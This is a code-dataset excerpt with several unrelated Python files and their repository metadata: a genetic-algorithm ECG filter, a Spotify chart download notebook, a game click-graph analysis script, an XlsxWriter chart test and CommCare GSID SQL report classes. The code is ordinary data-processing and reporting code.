        band1_FS = [0, noise_f[0] - width_FS/2 - trans_FS, noise_f[0] - width_FS/2, noise_f[0] + width_FS/2, noise_f[0] + width_FS/2 + trans_FS, fs/2]
        band2_FS = [0, noise_f[1] - width_FS/2 - trans_FS, noise_f[1] - width_FS/2, noise_f[1] + width_FS/2, noise_f[1] + width_FS/2 + trans_FS, fs/2]
        gain_FS = [1, 1, 0, 0, 1, 1]  # Gain coefficients of bands
        filter1_FS = signal.firwin2(N_Coeff+1, band1_FS, gain_FS, fs=fs)  # Filter for noise frequency 1
        filter2_FS = signal.firwin2(N_Coeff+1, band2_FS, gain_FS, fs=fs)  # Filter for noise frequency 2
        filter_FS = signal.convolve(filter1_FS, filter2_FS)               # Filter for both noise frequencies
        y_FS = signal.lfilter(filter_FS, 1, y_0)                          # Apply filter to time domain data
        f_FS, h_FS = signal.freqz(filter_FS, 1, fs=fs)                    # Filter Response
        FFT_FS = fft(y_FS)                                                # Filtered Frequency Domain Response
        return 0

    # TODO IIR filtering method — computes a cascaded notch response but
    # does not yet filter the signal; returns 0.
    def IIR(self, fs):
        """Second-order IIR notch design for two fixed noise frequencies.

        :param fs: sample rate, Hz
        """
        # The undesired frequencies and desired bandwidth
        freq1 = 31.456
        freq2 = 74.36
        BW = 5

        deg1 = 2 * np.pi * (freq1 / fs)
        deg2 = 2 * np.pi * (freq2 / fs)
        r = 1 - (BW / fs) * np.pi   # pole radius from the desired bandwidth

        # Assign the coefficients for first and second filters
        # (zeros on the unit circle, poles at radius r, same angles).
        a = 1 * 1
        b = (1 * -np.exp(-deg1 * 1j)) + (1 * -np.exp(deg1 * 1j))
        c = (1 * -np.exp(-deg1 * 1j)) * (1 * -np.exp(deg1 * 1j))
        d = 1 * 1 * 1j
        e = (-r * np.exp(-deg1 * 1j)) + (-r * np.exp(deg1 * 1j))
        f = (-r * np.exp(-deg1 * 1j)) * (-r * np.exp(deg1 * 1j))

        g = 1 * 1
        h = (-1 * np.exp(-deg2 * 1j)) + (-1 * np.exp(deg2 * 1j))
        ii = (-1 * np.exp(-deg2 * 1j)) * (-1 * np.exp(deg2 * 1j))
        j = 1 * 1
        k = (-r * np.exp(-deg2 * 1j)) + (-r * np.exp(deg2 * 1j))
        l = (-r * np.exp(-deg2 * 1j)) * (-r * np.exp(deg2 * 1j))

        # Calculate the gain of the overall transfer function at 10 Hz.
        Wf = 2 * np.pi * 10
        # Fixed: `np.i` does not exist (AttributeError); the imaginary unit
        # is the literal 1j. TODO(review): the third element mixes real and
        # imaginary exponents — likely intended to be np.exp(-2j * Wf);
        # confirm against the original assignment before changing.
        ND_array = [np.exp(0), np.exp(1j * Wf), np.exp(-2 * Wf)]
        H_Z1_dot = np.dot(ND_array, [a, b, c])
        H_Z2_dot = np.dot(ND_array, [d, e, f])
        Gain = abs(H_Z2_dot / H_Z1_dot)

        # Convolve numerators and denominators of the two biquads.
        NUM_Z = np.array(np.convolve([a, b, c], [g, h, ii]))
        DEN_Z = np.array(np.convolve([d, e, f], [j, k, l]))

        w, H = signal.freqz(Gain * NUM_Z, DEN_Z, self.N)
        f = fs * w / (2 * np.pi)
        return 0

    def SNR(self, y):
        """Fitness: raw-signal power minus the power of `y`.

        NOTE(review): despite the name this is a power *difference*, not a
        ratio — it is only used as a relative GA fitness score.
        """
        return self.P_0 - np.var(y)

    # Plots a Fast Fourier Transform for simple graphing
    def FFTplot(self, f, FFT, title="ECG Signal Frequency Spectrum"):
        """Plot the one-sided magnitude spectrum |FFT| against `f`."""
        plt.figure()
        plt.plot(f, abs(FFT)[:self.N_2])
        plt.xlabel("Frequency (Hz)")
        plt.ylabel("Voltage (uV)")
        plt.title(title)
        plt.show()
#The GA_filter function filters an input waveform
def GA_filter(waveform, input_num, solutions_per_population, mating_parent_number, num_generations):
    """Evolve filter parameters for `waveform` with a genetic algorithm.

    Each chromosome carries `input_num` genes; returns the fittest
    chromosome(s), their fitness, and the per-generation best fitnesses.
    """
    # Population shape: one row per candidate solution.
    pop_size = (solutions_per_population, input_num)
    population = ga.create_population(pop_size)

    best_outputs = []
    for generation in range(num_generations):
        # Score the current generation and remember its best fitness.
        fitness = ga.cal_pop_fitness(waveform, population)
        best_outputs.append(np.max(fitness))

        # Selection, crossover and mutation produce the next generation.
        parents = ga.select_mating_pool(population, fitness,
                                        mating_parent_number)
        offspring_crossover = ga.crossover(
            parents, offspring_size=(pop_size[0] - parents.shape[0], input_num))
        offspring_mutation = ga.mutation(offspring_crossover, num_mutations=2)

        # Elitism: parents survive, offspring fill the remaining slots.
        population[0:parents.shape[0], :] = parents
        population[parents.shape[0]:, :] = offspring_mutation

        if generation % 10 == 0 and generation != 0:
            print("{} Generations Completed".format(generation))

    # Score the final generation and return its best member(s).
    fitness = ga.cal_pop_fitness(waveform, population)
    best_match_idx = np.where(fitness == np.max(fitness))[0]
    return population[best_match_idx, :], fitness[best_match_idx][0][0], best_outputs
# Implementation of a Parks-McLellan Filter using Genetic Algorithms
def main():
    """Run the GA over one ECG recording and plot fitness/filter figures."""
    waveform = DSP_Signal("Signal_files/ECG15.txt")

    # Fixed parameters, found by trial and error.
    f_count = 2                     # genes per chromosome (two noise frequencies)
    mating_parent_number = 3
    pop_size = 20
    num_generations = 10
    my_dpi = 200  # dots per inch (resolution of an image)

    # Conduct a Genetic Algorithm approximation
    best_soln, best_soln_fitness, best_outputs = GA_filter(waveform,
                                                           f_count, pop_size,
                                                           mating_parent_number, num_generations)
    print("Best solution : \n", best_soln)
    print("Best solution fitness : \n", best_soln_fitness)

    # Figure 1: best fitness per generation.
    plt.figure(1)
    plt.plot(best_outputs, "-k", label="Fittest Output")
    plt.title("Fitness of ECG Signal using GA Algorithm")
    plt.xlabel("Number of Iterations")
    plt.ylabel("Fitness (Signal to Noise Ratio)")
    plt.legend(loc="upper right")
    plt.grid()
    plt.show()
    # plt.savefig('wiki/{}Gen{}Pop.png'.format(num_generations, pop_size))

    # Figure 2: same data labelled as the IIR filter curve.
    # NOTE(review): savefig() is called after show(); in non-interactive
    # backends the figure may already be cleared, saving a blank image.
    plt.figure(2, figsize=(10, 10), dpi=my_dpi)
    plt.plot(best_outputs, "-g", label="IIR Filter")
    plt.title("IIR Filter")
    plt.xlabel("Frequency (Hz)")
    plt.ylabel("Magnitude (uV)")
    plt.legend(loc="upper right")
    plt.grid()
    plt.savefig('wiki/IIR_magnitude.png', dpi = my_dpi)
    plt.show()

    # Spectra before and after applying the best Parks-McClellan filter.
    waveform.FFTplot(waveform.f, waveform.FFT_0, title="Before filtering")
    waveform.PM(best_soln[0])
    waveform.FFTplot(waveform.f, waveform.FFT_PM, title="After Filtering")

# NOTE(review): module runs on import — consider an `if __name__ == "__main__":` guard.
main()
| 45.300429 | 149 | 0.604642 |
795b9e508d3752d358ce339165273de8a1151812 | 1,184 | py | Python | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | BryceHaley/curriculum-jbook | d1246799ddfe62b0cf5c389394a18c2904383437 | [
"CC-BY-4.0"
] | 1 | 2022-03-18T18:19:40.000Z | 2022-03-18T18:19:40.000Z | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | callysto/curriculum-jbook | ffb685901e266b0ae91d1250bf63e05a87c456d9 | [
"CC-BY-4.0"
] | null | null | null | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | callysto/curriculum-jbook | ffb685901e266b0ae91d1250bf63e05a87c456d9 | [
"CC-BY-4.0"
] | null | null | null | 
<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Mathematics/StatisticsProject/AccessingData/spotify-popularity.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# Spotify Popularity
Using [Spotify data](https://spotifycharts.com/regional) we can see which songs are the most popular.
To look at just Canadian data, use the url `https://spotifycharts.com/regional/ca/daily/latest`
csv_url = 'https://spotifycharts.com/regional/global/daily/latest/download'
import pandas as pd
import requests
import io
r = requests.get(csv_url)
df = pd.read_csv(io.StringIO(r.text), skiprows=1)
df
[](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md) | 56.380952 | 425 | 0.793919 |
795ba13042aeac3da7c4e7d01077ab574108d512 | 5,296 | py | Python | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | null | null | null | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | null | null | null | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | 1 | 2021-03-30T18:39:08.000Z | 2021-03-30T18:39:08.000Z | """
Examines scaffold hypothesis on a particular user.
Uses data from the MySQL Database.
"""
import csv
import json
import numpy as np
import matplotlib.pyplot as plt
import igraph
PATH = "D:\\network_games\\"
SAVE_PATH = "D:\\network_games\\scaffold\\"
FILENAME = "scaffold_data_mysql.csv"
# Specify the name of the user whose data is needed to be processed
USER = "darigan17"
def parse_data(filename):
    """
    Parses data from a tab delimited CSV file, assembles user graph.

    :param filename: Input file name
    :return: The edge-usage graph for USER and the user name
    """
    with open(filename, 'r', encoding='utf-8') as csvfile:
        csv_reader = csv.reader(csvfile, delimiter='\t')
        print(f"Parsed file: {FILENAME}")
        line_count = 0
        user_count = 0
        seen_users = set()            # distinct users encountered, for the summary
        user_last_clicks = {}
        user_graph = igraph.Graph()
        # Fixed: `user` was unbound (NameError at return) when no row matched USER.
        user = USER
        for row in csv_reader:
            # Ignoring header row
            if line_count == 0:
                print(f'Columns: {", ".join(row)}')
                line_count += 1
            # Ignoring data from other users
            elif row[2] == USER:
                line_count += 1
                user = row[2]
                article = row[3]
                game = row[4]
                # Fixed: user_count was never incremented, so the summary
                # line always reported "0 users created".
                if user not in seen_users:
                    seen_users.add(user)
                    user_count += 1
                # Add the article as a vertex if it is not present yet.
                try:
                    user_graph.vs.find(article)
                except ValueError:
                    user_graph.add_vertex(name=article)
                # Consecutive clicks within the same game form an edge.
                if user_last_clicks.get('game', "") == game:
                    if user_last_clicks['article'] != article:
                        # Either add edge or increase its weight if it already exists
                        try:
                            e = user_graph.es.find(_source=user_last_clicks['article'], _target=article)
                            e['weight'] += 1
                        except ValueError:
                            user_graph.add_edge(source=user_last_clicks['article'], target=article, weight=1)
                user_last_clicks = {"article": article, "game": game}
            else:
                continue
        print(f"{user_count} users created")
        return user_graph, user
def analyse_graph(user_graph, user):
    """
    Analyses the scaffold graph of the current user.

    Saves three figures under SAVE_PATH: the degree distribution, the edge
    weight distribution, and a plot of the high-betweenness subgraph.
    """
    print("Analysing user graph...")

    # Degree distribution on log-log axes, saved as *_dd.png.
    degree_dist = np.bincount(user_graph.degree())
    x = range(degree_dist.size)
    fig = plt.figure()
    fig.suptitle("Degree distribution")
    plt.plot(x, degree_dist, c="blue")
    plt.xlabel("Number of connections")
    plt.ylabel("Number of nodes")
    plt.xscale("log")
    plt.yscale("log")
    # plt.show()
    fig.savefig(SAVE_PATH + f"mysql_{user}_dd.png")
    plt.close(fig)

    # Edge weight distribution on log-log axes, saved as *_ew.png.
    edge_weights = user_graph.es['weight']
    counts = np.bincount(edge_weights)
    x = range(counts.size)
    fig, ax = plt.subplots()
    ax.plot(x, counts, 'bo')
    ax.set_xlabel("Weights (Number of uses)")
    ax.set_ylabel("Occurrences (Number of edges with particular weight)")
    ax.set_title("Edge weight distribution")
    plt.yscale("log")
    plt.xscale("log")
    plt.grid()
    fig.savefig(SAVE_PATH + f"mysql_{user}_ew.png")
    # plt.show()
    plt.close(fig)

    # Keep only vertices in the top decile of betweenness centrality.
    btwn = user_graph.betweenness(directed=True, weights=None)
    ntile = np.percentile(btwn, 90)
    sub_vs = user_graph.vs.select([v for v, b in enumerate(btwn) if b >= ntile])
    sub_graph = user_graph.subgraph(sub_vs)
    print(f'Generated subgraph with {sub_graph.vcount()} vertices and {sub_graph.ecount()} edges.')

    # Color edges by weight bucket: <3 orange, 3-7 darkorange, 8-14 red, >=15 blue.
    colors = ["orange", "darkorange", "red", "blue"]
    for e in sub_graph.es:
        weight = e['weight']
        if weight >= 15:
            e['color'] = colors[3]
        elif 8 <= weight < 15:
            e['color'] = colors[2]
        elif 3 <= weight < 8:
            e['color'] = colors[1]
        else:
            e['color'] = colors[0]

    # Clip edge widths into a drawable range.
    edge_widths = np.clip(a=sub_graph.es['weight'], a_min=4, a_max=15)

    # Styling graph
    visual_style = {"bbox": (3000, 3000), "margin": 17, "vertex_color": 'grey', "vertex_size": 15,
                    "vertex_label_size": 4, "edge_curved": False, "edge_width": edge_widths}

    # Fruchterman-Reingold layout can exhaust memory on large subgraphs,
    # so plotting is best-effort.
    try:
        layout = sub_graph.layout("fr")
        visual_style["layout"] = layout
        save_name = f'mysql_{user}_reduced.png'
        igraph.plot(sub_graph, SAVE_PATH + save_name, **visual_style)
        print(f"Graph from {user} analysed and plotted to {save_name}")
    except MemoryError:
        print(f"Memory error. Skipping to plot {user}'s graph.")
def load_graph(filename):
    """Load a previously saved scaffold graph from `filename`."""
    return igraph.load(filename)
def save_graph(graph):
    """Persist the scaffold graph in GML format under SAVE_PATH."""
    target = SAVE_PATH + f'mysql_{USER}.gml'
    igraph.save(graph, filename=target)
def main():
    """Build, analyse and persist the scaffold graph for USER."""
    user_graph, user = parse_data(PATH + FILENAME)
    analyse_graph(user_graph, user)
    save_graph(user_graph)

    # To re-analyse a previously saved graph instead:
    # user_graph = load_graph(SAVE_PATH + f'mysql_{USER}.gml')
    # analyse_graph(user_graph, USER)
main()
| 31.337278 | 109 | 0.599131 |
795ba1cad868c2c03dff4b5d9dd221b32fddf550 | 1,467 | py | Python | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """

    def setUp(self):
        self.set_filename('chart_str02.xlsx')

    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file when the chart data contains strings."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()

        chart = workbook.add_chart({'type': 'scatter'})
        chart.axis_ids = [41671680, 41669376]

        # Column data includes strings, which the chart must tolerate.
        columns = [
            ('A1', [1, 2, 'Foo', 4, 5]),
            ('B1', [2, 4, 'Bar', 8, 10]),
            ('C1', [3, 6, 'Baz', 12, 15]),
        ]
        for cell, values in columns:
            worksheet.write_column(cell, values)

        # Two series share the same category range.
        for value_range in ('=Sheet1!$B$1:$B$5', '=Sheet1!$C$1:$C$5'):
            chart.add_series({
                'categories': '=Sheet1!$A$1:$A$5',
                'values': value_range,
            })

        worksheet.insert_chart('E9', chart)

        workbook.close()

        self.assertExcelEqual()
795ba2cdf62e09c0415ea43fca2d26305c91f9d6 | 30,587 | py | Python | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | import functools
from sqlagg.columns import *
from sqlagg.base import AliasColumn
from sqlagg.filters import *
from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader, DataTablesColumnGroup, DTSortType
from corehq.apps.reports.graph_models import MultiBarChart, LineChart, Axis
from corehq.apps.reports.sqlreport import DatabaseColumn, SummingSqlTabularReport, AggregateColumn, calculate_total_row
from corehq.apps.reports.standard import CustomProjectReport, DatespanMixin
from corehq.apps.reports.standard.maps import GenericMapReport
from corehq.apps.reports.util import format_datatables_data
from corehq.apps.userreports.sql import get_table_name
from corehq.const import USER_MONTH_FORMAT
from corehq.util.dates import iso_string_to_date
from dimagi.utils.decorators.memoized import memoized
from dimagi.utils.parsing import json_format_date
from util import get_unique_combinations, capitalize_fn
from datetime import timedelta
class StaticColumn(AliasColumn):
    """An AliasColumn that ignores the row and always renders a fixed value."""
    column_key = None

    def __init__(self, key, value):
        super(StaticColumn, self).__init__(key)
        self.value = value  # constant rendered for every row

    def get_value(self, row):
        # `row` is deliberately ignored — the column is static.
        return self.value
class GSIDSQLReport(SummingSqlTabularReport, CustomProjectReport, DatespanMixin):
    """Base class for GSID SQL reports: filters, location aggregation and
    common location columns shared by the concrete report subclasses."""
    # Filter controls rendered on the report page.
    fields = ['custom.apps.gsid.reports.TestField',
              'corehq.apps.reports.filters.dates.DatespanFilter',
              'custom.apps.gsid.reports.AsyncClinicField',
              'custom.apps.gsid.reports.AggregateAtField']
    exportable = True
    emailable = True
    # Finest aggregation level offered when the user selects nothing.
    default_aggregation = "clinic"

    def __init__(self, request, base_context=None, domain=None, **kwargs):
        # 'map' is popped so the base class never sees it; it marks this
        # instance as backing a map view rather than a table.
        self.is_map = kwargs.pop('map', False)
        super(GSIDSQLReport, self).__init__(request, base_context=base_context, domain=domain, **kwargs)

    @property
    def table_name(self):
        # UCR table holding one row per patient test result.
        return get_table_name(self.domain, 'patient_summary')

    @property
    def daterange_display(self):
        """Human-readable "start to end" string for the selected datespan."""
        format = "%d %b %Y"
        st = self.datespan.startdate.strftime(format)
        en = self.datespan.enddate.strftime(format)
        return "%s to %s" % (st, en)

    @property
    def report_subtitles(self):
        """Subtitle lines describing the active date/location/disease/test filters."""
        if self.needs_filters:
            return []
        subtitles = ["Date range: %s" % self.daterange_display]
        if self.selected_fixture():
            # selected_fixture() yields (location_tag, fixture_item_id).
            tag, id = self.selected_fixture()
            location = FixtureDataItem.get(id).fields_without_attributes['%s_name' % tag]
            subtitles.append('Location: %s' % location)

        if self.disease:
            location = FixtureDataItem.get(self.disease[1]).fields_without_attributes['disease_name']
            subtitles.append('Disease: %s' % location)

        if self.test_version:
            test_version = FixtureDataItem.get(self.test_version[1]).fields_without_attributes['visible_test_name']
            subtitles.append('Test Version: %s' % test_version)

        return subtitles

    @property
    @memoized
    def diseases(self):
        """Parallel lists of disease ids and display names from the fixture."""
        disease_fixtures = FixtureDataItem.by_data_type(
            self.domain,
            FixtureDataType.by_domain_tag(self.domain, "diseases").one()
        )
        return {
            "ids": [d.fields_without_attributes["disease_id"] for d in disease_fixtures],
            "names": [d.fields_without_attributes["disease_name"] for d in disease_fixtures]
        }

    @property
    def test_types(self):
        """All test names configured in the 'test' fixture."""
        test_fixtures = FixtureDataItem.by_data_type(
            self.domain,
            FixtureDataType.by_domain_tag(self.domain, "test").one()
        )
        return [t.fields_without_attributes["test_name"] for t in test_fixtures]

    @property
    def filter_values(self):
        """SQL bind parameters; disease ids and test names map to themselves
        so subclasses can reference them directly in filters."""
        ret = dict(
            domain=self.domain,
            startdate=self.datespan.startdate_param,
            enddate=self.datespan.enddate_param,
            male="male",
            female="female",
            positive="POSITIVE"
        )

        DISEASES = self.diseases["ids"]
        TESTS = self.test_types

        ret.update(zip(DISEASES, DISEASES))
        ret.update(zip(TESTS, TESTS))

        return ret

    @property
    def filters(self):
        # Base filters (domain + date window) plus any disease/test filter.
        return [EQ("domain", "domain"), BETWEEN("date", "startdate", "enddate")] + self.disease_filters

    @property
    def disease(self):
        """Selected disease as [disease_id, fixture_item_id], or None."""
        disease = self.request.GET.get('test_type_disease', '')
        return disease.split(':') if disease else None

    @property
    def test_version(self):
        """Selected test version as [test_name, fixture_item_id], or None."""
        test = self.request.GET.get('test_type_test', '')
        return test.split(':') if test else None

    @property
    def disease_filters(self):
        """SQL filters for the disease/test selection; a specific test
        version takes precedence over a disease-wide filter."""
        disease = self.disease
        test = self.test_version

        filters = []
        if test:
            filters.append(EQ("test_version", test[0]))
        elif disease:
            filters.append(EQ("disease_name", disease[0]))

        return filters

    @property
    @memoized
    def gps_key(self):
        # Column key holding coordinates: plain "gps" at clinic level,
        # "gps_<level>" for coarser aggregations.
        gps_key = "gps"
        agg_at = self.request.GET.get('aggregate_at', None)
        if agg_at and not agg_at == "clinic":
            gps_key = "gps_" + agg_at
        return gps_key

    @property
    def group_by(self):
        # Group results by every active location level.
        return self.place_types

    @property
    def keys(self):
        """Yield one key (list of place ids) per location combination."""
        combos = get_unique_combinations(self.domain, place_types=self.place_types, place=self.selected_fixture())
        for c in combos:
            yield [c[pt] for pt in self.place_types]

    def selected_fixture(self):
        """Selected location as (place_tag, fixture_item_id), or None."""
        fixture = self.request.GET.get('fixture_id', "")
        return fixture.split(':') if fixture else None

    @property
    @memoized
    def place_types(self):
        """Active location hierarchy levels, from country down to the
        effective aggregation level (never coarser than the chosen place)."""
        opts = ['country', 'province', 'district', 'clinic']
        agg_at = self.request.GET.get('aggregate_at', None)
        agg_at = agg_at if agg_at and opts.index(agg_at) <= opts.index(self.default_aggregation) else self.default_aggregation

        place = self.selected_fixture()
        agg_at = place[0] if place and opts.index(agg_at) < opts.index(place[0]) else agg_at

        return opts[:opts.index(agg_at) + 1]

    @property
    def common_columns(self):
        """One capitalized display column per active location level."""
        columns = []

        for place in self.place_types:
            columns.append(DatabaseColumn(place.capitalize(), SimpleColumn(place), format_fn=capitalize_fn))

        return columns
class GSIDSQLPatientReport(GSIDSQLReport):
name = "Patient Summary Report"
slug = "patient_summary_sql"
section_name = "patient summary"
age_range_map = {'male': [None, None], 'female': [None, None], 'total': [None, None]}
def age_fn(self, key, min, max):
    """Widen the tracked age range for `key` ('male'/'female'/'total') and
    return this row's range formatted as "min - max".

    NOTE(review): `age_range_map` is a mutable *class* attribute, so the
    accumulated bounds are shared across all instances of this report —
    verify this is intended for the per-request lifecycle.
    `min`/`max` shadow the builtins; names kept for compatibility.
    """
    age_range = self.age_range_map[key]
    if min is not None and (age_range[0] is None or min < age_range[0]):
        self.age_range_map[key][0] = min
    if max is not None and (age_range[1] is None or max > age_range[1]):
        self.age_range_map[key][1] = max
    return self.format_age_range(min, max)
def format_age_range(self, min, max):
    """Render an age range as "min - max", substituting "-" for missing bounds."""
    return str(min if min is not None else "-") + " - " + str(max if max is not None else "-")
def percent_agg_fn(self, x, t):
    """Format a count `x` with its percentage of total `t` for datatables.

    Returns {'sort_key': raw count, 'html': "x (p%)"}; a zero/None total is
    guarded with `or 1`. NOTE(review): under Python 3 the division is true
    division, so the percentage renders as a float — likely a Python 2
    holdover; confirm the intended display format.
    """
    return dict(sort_key=x or 0, html="%(x)s (%(p)s%%)" % \
        {
            "x": x or 0,
            "p": (100 * int(x or 0) / (t or 1))
        })
@property
def columns(self):
sum_fn = lambda x, y: int(x or 0) + int(y or 0)
total_percent_agg_fn = lambda f_pos, m_pos, f_tot, m_tot: dict(sort_key=sum_fn(f_pos, m_pos), html="%(x)s (%(p)s%%)" % \
{
"x": sum_fn(f_pos, m_pos),
"p": (100 * sum_fn(f_pos, m_pos) / (sum_fn(m_tot, f_tot) or 1))
})
patient_number_group = DataTablesColumnGroup("Tests")
positive_group = DataTablesColumnGroup("Positive Tests")
age_range_group = DataTablesColumnGroup("Age Range")
male_filter = EQ("gender", "male")
female_filter = EQ("gender", "female")
columns = self.common_columns + [
DatabaseColumn(
"Number of Males ",
CountColumn('doc_id', alias="male-total", filters=self.filters + [male_filter]),
header_group=patient_number_group
),
DatabaseColumn(
"Number of Females ",
CountColumn('doc_id', alias="female-total", filters=self.filters + [female_filter]),
header_group=patient_number_group
),
AggregateColumn(
"Total", sum_fn,
[AliasColumn("male-total"), AliasColumn("female-total")],
header_group=patient_number_group
),
AggregateColumn(
"Male +ve Percent", self.percent_agg_fn,
[
CountColumn(
'doc_id',
alias="male-positive",
filters=self.filters + [AND([male_filter, EQ("diagnosis", "positive")])]
),
AliasColumn("male-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Female +ve Percent", self.percent_agg_fn,
[
CountColumn('doc_id',
alias="female-positive",
filters=self.filters + [AND([female_filter, EQ("diagnosis", "positive")])]
),
AliasColumn("female-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Total +ve Percent", total_percent_agg_fn,
[
AliasColumn("female-positive"),
AliasColumn("male-positive"),
AliasColumn("female-total"), AliasColumn("male-total")
],
header_group=positive_group, sort_type=DTSortType.NUMERIC
),
AggregateColumn(
"Male age range", functools.partial(self.age_fn, 'male'),
[
MinColumn("age", alias="male-min", filters=self.filters + [male_filter]),
MaxColumn("age", alias="male-max", filters=self.filters + [male_filter])
],
header_group=age_range_group
),
AggregateColumn(
"Female age range", functools.partial(self.age_fn, 'female'),
[
MinColumn("age", alias="female-min", filters=self.filters + [female_filter]),
MaxColumn("age", alias="female-max", filters=self.filters + [female_filter])
],
header_group=age_range_group
),
AggregateColumn(
"All age range", functools.partial(self.age_fn, 'total'),
[
MinColumn("age", alias="age-min", filters=self.filters + [OR([female_filter, male_filter])]),
MaxColumn("age", alias="age-max", filters=self.filters + [OR([female_filter, male_filter])])
],
header_group=age_range_group
),
]
if self.is_map:
columns.append(DatabaseColumn("gps", MaxColumn(self.gps_key), format_fn=lambda x: x))
disease = FixtureDataItem.get(self.disease[1]).fields_without_attributes['disease_name'] if self.disease else 'All diseases'
columns.append(DatabaseColumn('disease', StaticColumn('disease', disease)))
return columns
@property
def rows(self):
rows = super(GSIDSQLPatientReport, self).rows
self.total_row[0] = 'Total'
# total age ranges
col_start = -5 if self.is_map else -3
self.total_row[col_start] = self.format_age_range(self.age_range_map['male'][0], self.age_range_map['male'][1])
self.total_row[col_start+1] = self.format_age_range(self.age_range_map['female'][0], self.age_range_map['female'][1])
self.total_row[col_start+2] = self.format_age_range(self.age_range_map['total'][0], self.age_range_map['total'][1])
# formatted percent totals
pos_col_start = -8 if self.is_map else -6
tot_col_start = -11 if self.is_map else -9
m_tot = self.total_row[tot_col_start]
f_tot = self.total_row[tot_col_start+1]
tot = self.total_row[tot_col_start+2]
m_pos = self.total_row[pos_col_start]
f_pos = self.total_row[pos_col_start+1]
tot_pos = self.total_row[pos_col_start+2]
self.total_row[pos_col_start] = self.percent_agg_fn(m_pos, m_tot)
self.total_row[pos_col_start+1] = self.percent_agg_fn(f_pos, f_tot)
self.total_row[pos_col_start+2] = self.percent_agg_fn(tot_pos, tot)
return rows
@property
def charts(self):
rows = self.rows
loc_axis = Axis(label="Location")
tests_axis = Axis(label="Number of Tests", format=",.1d")
chart = MultiBarChart("Number of Tests Per Location", loc_axis, tests_axis)
chart.stacked = True
chart.tooltipFormat = " in "
chart.add_dataset(
"Male Tests",
[{'x':row[-10], 'y':row[-9]['html'] if row[-9] != "--" else 0} for row in rows],
color="#0006CE"
)
chart.add_dataset(
"Female Tests",
[{'x':row[-10], 'y':row[-8]['html'] if row[-8] != "--" else 0} for row in rows],
color="#70D7FF"
)
return [chart]
class GSIDSQLByDayReport(GSIDSQLReport):
    """Per-day test counts: one row per (location, disease) pair."""
    name = "Day Summary Report"
    slug = "day_summary_sql"
    section_name = "day summary"

    @property
    def group_by(self):
        return super(GSIDSQLByDayReport, self).group_by + ["date", "disease_name"]

    @property
    def columns(self):
        return self.common_columns + [
            DatabaseColumn("Count", CountColumn("doc_id", alias="day_count")),
            DatabaseColumn("disease", SimpleColumn("disease_name", alias="disease_name"))
        ]

    def daterange(self, start_date, end_date):
        """Yield each date from start_date to end_date (inclusive) as a JSON date string."""
        for n in range(int((end_date - start_date).days) + 1):
            yield json_format_date(start_date + timedelta(n))

    @property
    def headers(self):
        """Place/disease columns, then one column per day grouped by calendar month."""
        startdate = self.datespan.startdate
        enddate = self.datespan.enddate
        column_headers = []
        group_by = self.group_by[:-2]
        for place in group_by:
            column_headers.append(DataTablesColumn(place.capitalize()))
        column_headers.append(DataTablesColumn("Disease"))
        # Accumulate day columns; flush a group whenever the month changes.
        prev_month = startdate.month
        month_columns = [startdate.strftime(USER_MONTH_FORMAT)]
        for n, day in enumerate(self.daterange(startdate, enddate)):
            day_obj = iso_string_to_date(day)
            month = day_obj.month
            day_column = DataTablesColumn("Day%(n)s (%(day)s)" % {'n': n + 1, 'day': day})
            if month == prev_month:
                month_columns.append(day_column)
            else:
                month_group = DataTablesColumnGroup(*month_columns)
                column_headers.append(month_group)
                month_columns = [day_obj.strftime(USER_MONTH_FORMAT), day_column]
                prev_month = month
        # Flush the final (possibly only) month group.
        month_group = DataTablesColumnGroup(*month_columns)
        column_headers.append(month_group)
        return DataTablesHeader(*column_headers)

    @property
    def rows(self):
        startdate = self.datespan.startdate
        enddate = self.datespan.enddate
        old_data = self.data
        rows = []
